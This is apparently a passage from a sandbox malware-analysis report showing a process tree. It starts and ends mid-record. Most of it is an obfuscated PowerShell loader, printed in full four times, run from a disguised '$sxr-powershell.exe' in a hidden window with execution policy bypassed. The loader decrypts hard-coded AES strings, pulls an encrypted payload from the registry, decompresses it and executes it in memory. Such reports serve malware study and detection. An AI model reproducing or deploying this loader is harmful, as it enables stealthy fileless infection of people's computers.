'')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3724
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4144
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3392
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2140
                                                                                                                  • C:\Windows\$sxr-powershell.exe
